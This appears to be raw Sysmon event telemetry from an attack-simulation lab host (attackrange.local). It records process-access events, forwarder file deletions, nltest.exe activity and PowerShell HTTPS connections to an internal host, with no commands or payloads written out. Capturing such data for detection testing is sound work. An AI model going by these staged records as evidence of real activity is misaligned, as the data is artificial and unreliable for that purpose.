18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035085334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.701{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56718-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:19.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17ECB297E72D7346CBE23D0BF49998BC,SHA256=D4B52CDA812867C52A8F7A1A5A12FC6B91B653588697B958DBB6DD5034D81457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:19.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=26931B0B864DA04F09514488678E5AC2,SHA256=867C183D8A0B23EC196AE71C1F37E372541776DD627DEEB4F58AA1053AD798EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:20.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B99D046F5162134C8889B36CDA8A6A,SHA256=10B4DB90FB3AF3CF278EA883A4C4089B0D3C83C195626A04C5CFF1E6B55D4B2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:21.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EE934C4E95586BE345CAA5511E6A698,SHA256=97A5787F1A5E5B8E05E464B9E371D7CCCDFCE09E77EE030018CC4AAB1022C8B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:22.389{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E117E2D7E9B9A20C4C0488BEBD9CFAC1,SHA256=E71AA65E1E46590B07557AD92C84434ED81B693096567182FB8D6AB1630C8162,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:23.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=079FF44268692FBE79B781CC03BBEDA8,SHA256=F1BEB6EDA81933D3968680989547E52112FE398FA6CF3EAA435FC66BD8448BFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:23.419{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED14D7AF771179B6BA537C0ECAA762B1,SHA256=4A52C2C4F7E38ED36CD4C4633557479EBAF0C32502F88BF12914291F144FB3B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:24.454{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C4EB9A607BEE39FFA2BF3A2E794F46,SHA256=46BA0F63E27C20FD71E3C06857683052E6FB5FC9E7C831B33A14830C77215832,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:48.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56719-false10.0.1.12-8000- 23542300x800000000000000035085343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:25.473{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FAF71544816565AE012F30EA0C4A526,SHA256=1F701B9455BDBAC741D6BEEAA3929906010D7A7075CF785AB779380768260CEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:48.712{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56720-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:26.488{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED1A44CC19D9F7BF20D0FE187B2BD0D6,SHA256=34164589D951F686F9746F94295C20B9A95ED90623F6B20BDB3886C7AACD2C18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 